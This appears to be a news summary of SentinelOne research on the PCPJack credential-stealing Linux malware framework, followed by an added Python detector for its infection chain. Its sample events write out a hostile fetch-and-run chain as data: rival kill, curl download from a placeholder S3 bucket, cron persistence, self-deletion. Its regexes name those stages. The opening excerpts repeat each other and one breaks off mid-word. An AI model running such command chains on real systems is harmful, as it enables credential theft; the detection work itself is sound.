
"A PCPJack infection, the cybersecurity company says, begins with a Linux shell script that sets up the environment and fetches additional payloads. Before that, it searches the system for processes and artifacts matching known TeamPCP infections and removes them. Next, the script creates a Python virtual environment, downloads six modules from an AWS S3 bucket, renames them, establishes persistence, launches the first module, which serves as the main framework orchestrator, and then deletes itself."
"The remaining modules, which are imported by the orchestrator, were designed for specific purposes, including credential parsing, lateral movement, command-and-control (C&C) message encryption, cloud IP range lookups, and cloud scanning. From the local system, PCPJack can steal .env and configuration files, environment variables, SSH keys, cryptocurrency wallets, credentials, and tokens for various web apps and cloud services, including AWS, Kubernetes, Docke"
"SentinelOne has named the framework PCPJack, due to its focus on removing from the infected systems any tools and artifacts associated with TeamPCP, the hacking group behind a recent flurry of supply chain attacks targeting multiple open source software ecosystems. "Many of the services targeted by the PCPJack framework are similar to the early TeamPCP/PCPCat campaigns from December 2025, before the high-visibility campaigns of early 2026 brought significant attention to TeamPCP and purportedly led to changes in group membership. We believe this could be a former operator who is deeply familiar with the group's tooling," SentinelOne says."
"Active since late April, the campaign relies on a malware framework targeting credentials across multiple cloud environments and capable of propagating itself. A PCPJack infection begins with a Linux shell script that sets up the environment and fetches additional payloads, then removes known TeamPCP processes and artifacts before deploying additional modules."
A threat actor is running a campaign that strips TeamPCP tooling out of already-infected systems and installs its own malicious framework in its place. The activity began in late April and relies on a malware framework that harvests credentials across multiple cloud environments and can propagate itself. SentinelOne named the framework PCPJack because it removes TeamPCP tools and artifacts from compromised hosts. The services it targets resemble the early TeamPCP/PCPCat campaigns of December 2025, and SentinelOne believes the operator may be a former member of the group who is closely familiar with its tooling. Infection starts with a Linux shell script that searches for and kills known TeamPCP processes and deletes their artifacts, then creates a Python virtual environment, downloads six modules from an AWS S3 bucket, renames them, establishes persistence, launches the orchestrator module, and deletes itself. The orchestrator imports the remaining modules, which handle credential parsing, lateral movement, command-and-control message encryption, cloud IP range lookups, and cloud scanning. Together they let PCPJack steal .env and configuration files, environment variables, SSH keys, cryptocurrency wallets, and credentials and tokens for web apps and cloud services such as AWS, Kubernetes and Docker from the local system.
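The infection chain above is a sequence of ordinary-looking shell actions that is only suspicious in combination. The following detector, added here as an illustration and not code from SentinelOne or SecurityWeek, scores process-execution events per host against generic behavioural stages derived from that description (rival-process kill, venv creation, fetch from an S3 hostname, rename to a .py module, a persistence write, launch from the venv interpreter, and deletion of the launching script). The stage regexes, the threshold, the event schema and the sample events are all assumptions constructed for the example; none of them are published PCPJack indicators.

```python
"""Heuristic detector for a PCPJack-style Linux infection chain.

Added example, not SentinelOne/SecurityWeek code. Stage patterns are
generic behaviours inferred from the public description; they are not
real indicators of compromise. Event schema (ts, host, cmd) is assumed.
"""
import json
import re
from collections import defaultdict

# One regex per stage of the described chain (assumed, generic patterns).
STAGE_PATTERNS = {
    "kill_rival":  re.compile(r"\b(pkill|killall)\b|\bkill\s+-9\b"),
    "venv_create": re.compile(r"\bpython3?\s+-m\s+venv\b|\bvirtualenv\b"),
    "s3_fetch":    re.compile(r"\b(curl|wget)\b.*https?://[^\s]*s3[.-][^\s]*amazonaws\.com"),
    "rename_py":   re.compile(r"\bmv\s+\S+\s+\S+\.py\b"),
    "persistence": re.compile(r"\bcrontab\s|/etc/cron|systemctl\s+enable\b|\.bashrc\b"),
    "venv_launch": re.compile(r"/bin/python3?\s+\S+\.py\b"),
}
# A shell script being launched, and an rm command; used to spot the
# script deleting itself (the final stage in the article's description).
SCRIPT_LAUNCH = re.compile(r"^(?:/bin/|/usr/bin/)?(?:ba)?sh\s+(?:-\w+\s+)*(\S+\.sh)\b")
RM_CMD = re.compile(r"^rm\s+(?:-\w+\s+)*(.+)$")


def analyse_events(events, threshold=4):
    """Group events by host, record which stages fire (in order seen) and
    flag hosts that hit at least `threshold` distinct stages."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)

    findings = {}
    for host, evs in by_host.items():
        stages, launched_scripts = [], set()
        for ev in evs:
            cmd = ev["cmd"]
            m = SCRIPT_LAUNCH.match(cmd)
            if m:
                launched_scripts.add(m.group(1))
            for name, pat in STAGE_PATTERNS.items():
                if name not in stages and pat.search(cmd):
                    stages.append(name)
            m = RM_CMD.match(cmd)
            if m and "self_delete" not in stages and any(
                s in m.group(1).split() for s in launched_scripts
            ):
                stages.append("self_delete")
        findings[host] = {"stages": stages, "suspicious": len(stages) >= threshold}
    return findings


# Constructed sample telemetry: one host showing the full chain, one
# developer box that legitimately builds a venv and pulls from S3.
SAMPLE_EVENTS = [json.loads(line) for line in """
{"ts": 1, "host": "web-01", "cmd": "bash /tmp/.x/setup.sh"}
{"ts": 2, "host": "web-01", "cmd": "pkill -f legacy-agent"}
{"ts": 3, "host": "web-01", "cmd": "python3 -m venv /tmp/.x/venv"}
{"ts": 4, "host": "web-01", "cmd": "curl -s -o /tmp/.x/m1 https://example-bucket.s3.amazonaws.com/m1"}
{"ts": 5, "host": "web-01", "cmd": "mv /tmp/.x/m1 /tmp/.x/core.py"}
{"ts": 6, "host": "web-01", "cmd": "crontab /tmp/.x/cron"}
{"ts": 7, "host": "web-01", "cmd": "/tmp/.x/venv/bin/python3 /tmp/.x/core.py"}
{"ts": 8, "host": "web-01", "cmd": "rm -f /tmp/.x/setup.sh"}
{"ts": 1, "host": "build-02", "cmd": "python3 -m venv .venv"}
{"ts": 2, "host": "build-02", "cmd": "curl -s -o wheel.whl https://example-bucket.s3.amazonaws.com/wheel.whl"}
{"ts": 3, "host": "build-02", "cmd": ".venv/bin/python3 setup.py"}
""".strip().splitlines()]


if __name__ == "__main__":
    print(json.dumps(analyse_events(SAMPLE_EVENTS), indent=2))
```

The threshold is what keeps the developer host quiet: venv creation, an S3 download and a venv-launched script are three routine stages on a build box, while the full chain adds the rival kill, the rename, the persistence write and the self-deletion. In production telemetry you would feed real process-exec events (auditd, eBPF or EDR) into `analyse_events` and tune the patterns and threshold to your own baseline.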
Read at SecurityWeek